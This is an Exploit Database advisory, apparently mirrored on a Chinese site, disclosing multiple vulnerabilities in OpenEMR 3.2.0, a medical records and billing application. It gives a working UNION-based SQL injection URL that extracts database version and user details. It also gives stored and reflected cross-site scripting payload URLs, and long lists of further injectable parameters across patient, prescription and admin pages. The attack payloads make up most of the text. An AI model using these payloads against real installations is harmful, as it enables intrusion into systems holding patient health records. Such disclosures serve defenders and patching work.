OpenEMR 3.2.0 – SQL Injection / Cross-Site Scripting

• Exploit Database
• 31 阅读

• 作者： blake
  日期： 2010-12-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15836/

• # Exploit Title: OpenEMR v3.2.0 Multiple Vulnerabilities
  # Date: December 26, 2010
  # Author: Blake
  # Software Link: http://sourceforge.net/projects/openemr/
  # Version: 3.2.0
  # Tested on: Windows XP SP3
  
  
  Description:
  Open Source Practice Management, Electronic Medical Record, Prescription Writing and Medical Billing application.
  
  
  SQL Injection:
  
  The issue parameter is vulnerable to sql injection:
  
  http://192.168.1.127/openemr/interface/patient_file/summary/add_edit_issue.php?issue=0+union+select+null,null,null,@@version,system_user(),database(),user(),null,null,null,null,null,null,null,null,null,null,null,null--
  
  Additional vulnerable parameters: 
  /openemr/controller.php [prescription&list&id parameter]
  /openemr/controller.php [prescription&multip rintcss&id parameter]
  /openemr/interface/main /calendar/index.php [pc_facility parameter]
  /openemr/interface /patient_file/summary/add _edit_issue.php [issue parameter]
  /openemr/interface /patient_file/summary /demographics.php [set_pid parameter]
  /openemr/interface /patient_file/summary /immunizations.php [administered_by_id parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [assigned_to parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [form_note_type parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [noteid parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [offset parameter]
  
  
  Stored XSS:
  The note parameter is vulnerable to stored XSS:
  
  http://192.168.1.127/openemr/interface/patient_file/summary/immunizations.php?mode=add&id=&pid=98&form_immunization_id=6&administered_date=2010-12-26&manufacturer=&lot_number=&administered_by=Administrator%2C+&administered_by_id=1&education_date=2010-12-26&vis_date=2010-12-26¬e=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E
  
  Additional vulnerable parameters:
  /openemr/interface /logview/logview.php [rumple parameter]
  /openemr/interface /patient_file/report /patient_report.php [form_title parameter]
  /openemr/interface /patient_file/summary /immunizations.php [manufacturer parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [assigned_to parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [rumple parameter]
  /openemr/interface /usergroup/usergroup _admin.php [rumple parameter]
  
  Reflected XSS:
  The parent_id parameter is vulnerable to reflected XSS:
  
  http://192.168.1.127/openemr/controller.php?document&upload&patient_id=2&parent_id=%22%3E%3Cscript%3Ealert%2810%29%3C/script%3E
  
  Additional vulnerable parameters:
  /openemr/controller.php [document&list&patient_id parameter]
  /openemr/controller.php [document&upload&patient _id parameter]
  /openemr/controller.php [document&upload&patient _id parameter]
  /openemr/controller.php [parent_id parameter]
  /openemr/controller.php [prescription&list&id parameter]
  /openemr/interface/forms /newpatient/save.php [facility_id parameter]
  /openemr/interface/forms /newpatient/save.php [form_date parameter]
  /openemr/interface/forms /newpatient/save.php [form_date parameter]
  /openemr/interface/forms /newpatient/save.php [form_onset_date parameter]
  /openemr/interface/forms /newpatient/save.php [form_sensitivity parameter]
  /openemr/interface/forms /newpatient/save.php [mode parameter]
  /openemr/interface/forms /newpatient/save.php [pc_catid parameter]
  /openemr/interface/forms /newpatient/save.php [reason parameter]
  /openemr/interface /language/language.php [edit parameter]
  /openemr/interface /language/language.php [m parameter]
  /openemr/interface/main /calendar/index.php [&pc_username[] parameter]
  /openemr/interface/main /calendar/index.php [pc_category parameter]
  /openemr/interface/main /calendar/index.php [pc_topic parameter]
  /openemr/interface/main /calendar/index.php [tplview parameter]
  /openemr/interface /patient_file/deleter.php [billing parameter]
  /openemr/interface /patient_file/summary/add _edit_issue.php [issue parameter]
  /openemr/interface /patient_file/summary /demographics.php [set_pid parameter]
  /openemr/interface /patient_file/summary /immunizations.php [administered_by_id parameter]
  /openemr/interface /patient_file/summary /immunizations.php [lot_number parameter]
  /openemr/interface /patient_file/summary /immunizations.php [manufacturer parameter]
  /openemr/interface /patient_file/summary /immunizations.php [note parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [assigned_to parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [form_active parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [form_inactive parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [noteid parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [set_pid parameter]
  /openemr/interface /usergroup/usergroup _admin.php [groupname parameter]
  /openemr/interface /usergroup/usergroup _admin.php [rumple parameter]
  /openemr/interface /patient_file/summary/add _edit_issue.php [form_title parameter]
  /openemr/interface /patient_file/summary /pnotes_full.php [note parameter]